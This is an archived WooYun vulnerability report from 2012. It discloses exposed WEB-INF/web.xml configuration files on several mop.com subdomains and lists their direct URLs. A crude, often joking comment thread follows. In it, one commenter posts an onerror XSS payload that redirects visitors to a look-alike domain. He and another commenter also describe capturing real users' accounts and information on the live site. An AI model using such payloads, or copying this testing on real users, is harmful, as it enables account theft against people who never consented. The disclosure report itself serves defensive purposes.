当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-014202

漏洞标题:J2ee分层架构安全应用配置续6-猫扑打包

相关厂商:猫扑

漏洞作者: shack2

提交时间:2012-11-01 18:01

修复时间:2012-12-16 18:02

公开时间:2012-12-16 18:02

漏洞类型:系统/服务运维配置不当

危害等级:低

自评Rank:5

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2012-11-01: 细节已通知厂商并且等待厂商处理中
2012-11-02: 厂商已经确认,细节仅向厂商公开
2012-11-12: 细节向核心白帽子及相关领域专家公开
2012-11-22: 细节向普通白帽子公开
2012-12-02: 细节向实习白帽子公开
2012-12-16: 细节向公众公开

简要描述:

web服务器配置不当

详细说明:

http://eyun.pet.mop.com/WEB-INF/web.xml
http://s39.sg.mop.com/WEB-INF/web.xml
http://s69.pet.mop.com/WEB-INF/web.xml
http://test.pet.mop.com/WEB-INF/web.xml

a.jpg

漏洞证明:

a.jpg

修复方案:

版权声明:转载请注明来源 shack2@乌云

漏洞回应

厂商回应:

危害等级:低

漏洞Rank:5

确认时间:2012-11-02 00:02

厂商回复:

.....

最新状态:

暂无

漏洞评价:

评论

  1. 2012-11-01 19:37 | 园长 ( 普通白帽子 | Rank:134 漏洞数:14 | 你在身边就是缘,缘分写在数据库里面。)

    如果又是WEB.XML?

  2. 2012-11-01 19:48 | 鬼魅羊羔 ( 普通白帽子 | Rank:299 漏洞数:42 | (#‵′)凸(#‵′)凸(#‵′)凸(#‵′)凸(#‵...)

    坐等忽略。。。猫扑的一概作风。。

  3. 2012-11-01 19:59 | 园长 ( 普通白帽子 | Rank:134 漏洞数:14 | 你在身边就是缘,缘分写在数据库里面。)

    @鬼魅羊羔 其实希望Java大妞们弄点高级点东西出来.....

  4. 2012-11-01 21:32 | Metasploit ( 实习白帽子 | Rank:37 漏洞数:7 | http://www.metasploit.cn/)

    没天一贴 造福基友 减少寂寞

  5. 2012-11-01 21:38 | shack2 ( 普通白帽子 | Rank:470 漏洞数:71 | QQ:1341413415 一个热爱编程(Java),热爱网...)

    其实我是在测试我的扫描器,乌云厂商第一页的全扫了。

  6. 2012-11-01 22:36 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    @shack2 ....

  7. 2012-11-01 22:39 | shack2 ( 普通白帽子 | Rank:470 漏洞数:71 | QQ:1341413415 一个热爱编程(Java),热爱网...)

    @xsser?

  8. 2012-11-01 22:40 | 鬼魅羊羔 ( 普通白帽子 | Rank:299 漏洞数:42 | (#‵′)凸(#‵′)凸(#‵′)凸(#‵′)凸(#‵...)

    @shack2 @xsser 我怀疑,你俩有基情。。。

  9. 2012-11-01 22:42 | shack2 ( 普通白帽子 | Rank:470 漏洞数:71 | QQ:1341413415 一个热爱编程(Java),热爱网...)

    @鬼魅羔羊 要不你也加入搞3p

  10. 2012-11-01 22:46 | 鬼魅羊羔 ( 普通白帽子 | Rank:299 漏洞数:42 | (#‵′)凸(#‵′)凸(#‵′)凸(#‵′)凸(#‵...)

    @shack2 哦!fuck!我是纯洁的孩纸。。

  11. 2012-11-01 22:56 | Finger 认证白帽子 ( 普通白帽子 | Rank:777 漏洞数:95 | 最近有人冒充该账号行骗,任何自称Finger并...)

    @鬼魅羔羊 你那个猫扑xss利用方法已发 确实能对用户造成危害 坐看猫扑继续忽略

  12. 2012-11-01 22:59 | 鬼魅羊羔 ( 普通白帽子 | Rank:299 漏洞数:42 | (#‵′)凸(#‵′)凸(#‵′)凸(#‵′)凸(#‵...)

    @Finger 能造成危害,我用那个拦下了挺多信息得,可猫扑人家不承认,木有办法。。

  13. 2012-11-01 23:00 | 鬼魅羊羔 ( 普通白帽子 | Rank:299 漏洞数:42 | (#‵′)凸(#‵′)凸(#‵′)凸(#‵′)凸(#‵...)

    @Finger 只要访问即可触发,太直接不过了,他们根本不重视。。。我都没啥心思弄了。。

  14. 2012-11-01 23:01 | Finger 认证白帽子 ( 普通白帽子 | Rank:777 漏洞数:95 | 最近有人冒充该账号行骗,任何自称Finger并...)

    鬼魅羊羔 呵呵 你那样只是本地读取了cookies 没能收集到 猫扑对链接做了处理 我是没办法调用外部js 猫扑可能认为这样无威胁

  15. 2012-11-01 23:01 | Finger 认证白帽子 ( 普通白帽子 | Rank:777 漏洞数:95 | 最近有人冒充该账号行骗,任何自称Finger并...)

    @鬼魅羊羔 呵呵 你那样只是本地读取了cookies 没能收集到 猫扑对链接做了处理 我是没办法调用外部js 猫扑可能认为这样无威胁

  16. 2012-11-01 23:03 | Finger 认证白帽子 ( 普通白帽子 | Rank:777 漏洞数:95 | 最近有人冒充该账号行骗,任何自称Finger并...)

    @xsser 在线呢 审核漏洞啊

  17. 2012-11-01 23:17 | 鬼魅羊羔 ( 普通白帽子 | Rank:299 漏洞数:42 | (#‵′)凸(#‵′)凸(#‵′)凸(#‵′)凸(#‵...)

    @Finger 嗯,虽然对外链做了限制,但并不是没有突破的方法,他们觉得咱们没拿到后台,就认为没威胁。。我觉得有必要深入下。。你提交了什么漏洞?

  18. 2012-11-01 23:19 | Finger 认证白帽子 ( 普通白帽子 | Rank:777 漏洞数:95 | 最近有人冒充该账号行骗,任何自称Finger并...)

    @鬼魅羊羔 就是你那个xss的利用方法 <img src="" onerror=document.location.hostname="hi.mop.com.diaoyu.com" />看这个你就明白了

  19. 2012-11-01 23:27 | 鬼魅羊羔 ( 普通白帽子 | Rank:299 漏洞数:42 | (#‵′)凸(#‵′)凸(#‵′)凸(#‵′)凸(#‵...)

    @Finger 这个方法好。。尼玛就是我手贱,不该乱测。。。你捕获到东西了吗?

  20. 2012-11-01 23:29 | Finger 认证白帽子 ( 普通白帽子 | Rank:777 漏洞数:95 | 最近有人冒充该账号行骗,任何自称Finger并...)

    @鬼魅羊羔 捕获几个账号测试下 之后就把插代码的留言删了

  21. 2012-11-01 23:37 | 鬼魅羊羔 ( 普通白帽子 | Rank:299 漏洞数:42 | (#‵′)凸(#‵′)凸(#‵′)凸(#‵′)凸(#‵...)

    @Finger 捕获成功了?

  22. 2012-11-01 23:41 | 0x0F ( 普通白帽子 | Rank:231 漏洞数:60 | 尖刀安全 (JDSec.Com).......................)

    @shack2 你来一打扫描器

  23. 2012-11-02 00:19 | 鬼魅羊羔 ( 普通白帽子 | Rank:299 漏洞数:42 | (#‵′)凸(#‵′)凸(#‵′)凸(#‵′)凸(#‵...)

    @Finger 尼玛,都有人开始劫持用户页面做广告了~~~可爱死了,不会是你吧。。哈哈

  24. 2012-11-02 08:41 | Finger 认证白帽子 ( 普通白帽子 | Rank:777 漏洞数:95 | 最近有人冒充该账号行骗,任何自称Finger并...)

    @鬼魅羊羔 额~ 绝对不是我 利用跳转做的?

  25. 2012-11-02 08:44 | Finger 认证白帽子 ( 普通白帽子 | Rank:777 漏洞数:95 | 最近有人冒充该账号行骗,任何自称Finger并...)

    此法可用于向不懂的人装B:<img src="" onerror=document.write("鬼魅羊羔路过") />

  26. 2012-11-02 09:06 | 鬼魅羊羔 ( 普通白帽子 | Rank:299 漏洞数:42 | (#‵′)凸(#‵′)凸(#‵′)凸(#‵′)凸(#‵...)

    @Finger fuck!不带这样的。。你是怎么捕获cookie的?

  27. 2012-11-02 09:16 | 重庆叁壹伍捌信息技术有限公司(乌云厂商)

    网站都打包了,才给5分?

  28. 2012-11-02 09:18 | 鬼魅羊羔 ( 普通白帽子 | Rank:299 漏洞数:42 | (#‵′)凸(#‵′)凸(#‵′)凸(#‵′)凸(#‵...)

    @重庆叁壹伍捌信息技术有限公司 这个真说不准,不知道这个打包,是不是咱们想的那种打包。。

  29. 2012-11-02 09:24 | 重庆叁壹伍捌信息技术有限公司(乌云厂商)

    @鬼魅羊羔 坐等

  30. 2012-11-02 09:24 | 鬼魅羊羔 ( 普通白帽子 | Rank:299 漏洞数:42 | (#‵′)凸(#‵′)凸(#‵′)凸(#‵′)凸(#‵...)

    @重庆叁壹伍捌信息技术有限公司 咱搬个板凳,一起坐等吧,亲,要爆米花么?

  31. 2012-11-02 09:35 | 重庆叁壹伍捌信息技术有限公司(乌云厂商)

    @鬼魅羊羔 亲,要鼠标键盘低音炮不?

  32. 2012-11-02 09:39 | 鬼魅羊羔 ( 普通白帽子 | Rank:299 漏洞数:42 | (#‵′)凸(#‵′)凸(#‵′)凸(#‵′)凸(#‵...)

    @重庆叁壹伍捌信息技术有限公司 要要要啊!你不给么~~~~别调戏我了。。洞都让人找完了。。。。

  33. 2012-11-02 09:55 | Micro Da ( 实习白帽子 | Rank:66 漏洞数:7 | Micro Da)

    。。坐这看着。。吃着爆米花

  34. 2012-12-04 15:53 | sysALong ( 路人 | Rank:19 漏洞数:5 | 电脑里的AV片 永远 和 电脑旁的卫生纸 成 ...)

    @xsser 这玩应可以刷分?